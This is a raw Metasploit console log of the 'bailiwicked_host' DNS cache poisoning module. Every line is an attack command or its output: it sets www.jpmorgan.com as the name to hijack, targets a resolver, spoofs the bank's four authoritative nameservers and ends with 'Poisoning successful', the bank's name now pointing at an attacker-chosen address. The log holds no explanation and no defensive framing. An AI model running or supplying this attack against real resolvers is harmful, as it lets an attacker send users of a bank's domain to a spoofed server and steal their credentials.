msf auxiliary(bailiwicked_host) > set HOSTNAME www.jpmorgan.com HOSTNAME => www.jpmorgan.com msf auxiliary(bailiwicked_host) > set RHOST 192.168.1.13 RHOST => 192.168.1.13 msf auxiliary(bailiwicked_host) > set SRCPORT 53 SRCPORT => 53 msf auxiliary(bailiwicked_host) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- HOSTNAME www.jpmorgan.com yes Hostname to hijack NEWADDR 1.3.3.7 yes New address for hostname RECONS 208.67.222.222 yes The nameserver used for reconnaissance RHOST 192.168.1.13 yes The target address SRCADDR Real yes The source address to use for sending the queries (accepted: Real, Random) SRCPORT 53 yes The target server's source query port (0 for automatic) TTL 35529 yes The TTL for the malicious host entry XIDS 0 yes The number of XIDs to try for each query (0 for automatic) msf auxiliary(bailiwicked_host) > set NEWADDR 192.168.1.226 NEWADDR => 192.168.1.226 msf auxiliary(bailiwicked_host) > run [*] Targeting nameserver 192.168.1.13 for injection of www.jpmorgan.com. as 192.168.1.226 [*] Querying recon nameserver for jpmorgan.com.'s nameservers... [*] Got an NS record: jpmorgan.com. 172800 IN NS ns05.jpmorganchase.com. [*] Querying recon nameserver for address of ns05.jpmorganchase.com.... [*] Got an A record: ns05.jpmorganchase.com. 172799 IN A 159.53.110.152 [*] Checking Authoritativeness: Querying 159.53.110.152 for jpmorgan.com.... [*] ns05.jpmorganchase.com. is authoritative for jpmorgan.com., adding to list of nameservers to spoof as [*] Got an NS record: jpmorgan.com. 172800 IN NS ns06.jpmorganchase.com. [*] Querying recon nameserver for address of ns06.jpmorganchase.com.... [*] Got an A record: ns06.jpmorganchase.com. 172798 IN A 159.53.110.153 [*] Checking Authoritativeness: Querying 159.53.110.153 for jpmorgan.com.... [*] ns06.jpmorganchase.com. is authoritative for jpmorgan.com., adding to list of nameservers to spoof as [*] Got an NS record: jpmorgan.com. 172800 IN NS ns1.jpmorganchase.com. [*] Querying recon nameserver for address of ns1.jpmorganchase.com.... [*] Got an A record: ns1.jpmorganchase.com. 172797 IN A 159.53.46.53 [*] Checking Authoritativeness: Querying 159.53.46.53 for jpmorgan.com.... [*] ns1.jpmorganchase.com. is authoritative for jpmorgan.com., adding to list of nameservers to spoof as [*] Got an NS record: jpmorgan.com. 172800 IN NS ns2.jpmorganchase.com. [*] Querying recon nameserver for address of ns2.jpmorganchase.com.... [*] Got an A record: ns2.jpmorganchase.com. 172795 IN A 159.53.78.53 [*] Checking Authoritativeness: Querying 159.53.78.53 for jpmorgan.com.... [*] ns2.jpmorganchase.com. is authoritative for jpmorgan.com., adding to list of nameservers to spoof as [*] Calculating the number of spoofed replies to send per query... [*] race calc: 100 queries | min/max/avg time: 0.25/0.6/0.3 | min/max/avg replies: 41/136/105 [*] Sending 39 spoofed replies from each nameserver (4) for each query [*] Attempting to inject a poison record for www.jpmorgan.com. into 192.168.1.13:53... [*] Sent 1000 queries and 156000 spoofed responses... [*] Recalculating the number of spoofed replies to send per query... [*] race calc: 25 queries | min/max/avg time: 0.27/0.8/0.32 | min/max/avg replies: 54/270/107 [*] Now sending 40 spoofed replies from each nameserver (4) for each query [*] Poisoning successful after 1750 queries and 276000 responses: www.jpmorgan.com == 192.168.1.226 [*] TTL: 35499 DATA: # [*] Auxiliary module execution completed msf auxiliary(bailiwicked_host) >